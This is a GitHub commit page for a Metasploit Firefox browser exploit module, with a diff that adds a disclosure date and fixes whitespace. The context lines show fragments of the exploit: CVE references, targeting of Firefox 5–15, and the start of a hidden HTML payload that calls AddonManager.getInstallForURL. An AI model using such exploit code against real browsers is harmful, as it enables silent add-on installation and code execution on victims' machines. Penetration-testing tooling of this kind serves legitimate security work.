Skip to content

Commit 955dfe5

Browse files
committed
msftidy it up.
1 parent b50bbc2 commit 955dfe5

File tree

1 file changed

+3
-2
lines changed

1 file changed

+3
-2
lines changed

modules/exploits/multi/browser/firefox_proto_crmfrequest.rb

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -34,6 +34,7 @@ def initialize(info = {})
3434
'moz_bug_r_a4', # discovered CVE-2013-1710
3535
'joev' # metasploit module
3636
],
37+
'DisclosureDate' => "Dec 19 2013",
3738
'References' => [
3839
['CVE', '2012-3993'], # used to install function that gets called from chrome:// (ff<15)
3940
['OSVDB', '86111'],
@@ -45,7 +46,7 @@ def initialize(info = {})
4546
:source => 'script',
4647
:ua_name => HttpClients::FF,
4748
:ua_ver => lambda { |ver| ver.to_i.between?(5, 15) }
48-
}
49+
}
4950
))
5051

5152
register_options([
@@ -73,7 +74,7 @@ def generate_html(target_info)
7374
%Q|
7475
<html>
7576
<body>
76-
#{datastore['CONTENT']}
77+
#{datastore['CONTENT']}
7778
<div id='payload' style='display:none'>
7879
if (!window.done){
7980
window.AddonManager.getInstallForURL(

0 commit comments

Comments
 (0)